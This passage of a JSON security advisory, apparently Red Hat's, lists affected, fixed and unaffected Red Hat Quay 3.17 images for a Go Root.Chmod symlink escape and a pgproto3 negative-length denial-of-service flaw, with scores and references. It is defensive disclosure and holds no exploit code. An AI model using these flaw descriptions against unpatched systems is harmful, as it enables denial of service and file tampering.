          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456336",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456336"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32282",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/763761",
          "url": "https://go.dev/cl/763761"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78293",
          "url": "https://go.dev/issue/78293"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4864",
          "url": "https://pkg.go.dev/vuln/GO-2026-4864"
        }
      ],
      "release_date": "2026-04-08T01:06:55.953000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root"
    },
    {
      "cve": "CVE-2026-32286",
      "cwe": {
        "id": "CWE-1285",
        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
      },
      "discovery_date": "2026-03-26T20:01:59.226117+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2451847"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the DataRow.Decode function within the github.com/jackc/pgproto3/v2 component. A malicious or compromised PostgreSQL server can exploit this by sending a DataRow message containing a negative field length. This improper validation of field lengths leads to a \"slice bounds out of range panic\", resulting in a Denial of Service (DoS) for the affected application.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The PostgreSQL server multicluster-globalhub-manager connects to is either provisioned by the operator itself or specified by the admin managing the deployment. To successfully exploit the vulnerability in this context the attacker would need to compromise the operator-deployed PostgreSQL server to force a crafted malicious DataRow message or they would need to have the privileges required to modify the operator-provisioned deployment or configure globalhub-manager to use a compromised/malicious \u201cBYO Postgres\u201d server.\n\nThe first scenario (compromising a legitimate PostgreSQL server) would change Attack Complexity from Low to High resulting in an adjusted CVSS v3.1 score of 5.9 (Moderate)\nThe other scenarios (manipulating the operator provisioned-deployment or configuring the globalhub-manager to use a malicious server) would maintain AC:L but would require privileged access. This would change Privileges Required from None to High resulting in an adjusted CVSS v3.1 score of 4.9 (Moderate)\n\nBased on the above the Impact Rating for multicluster-globalhub-manager-rhel9 is  Moderate.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
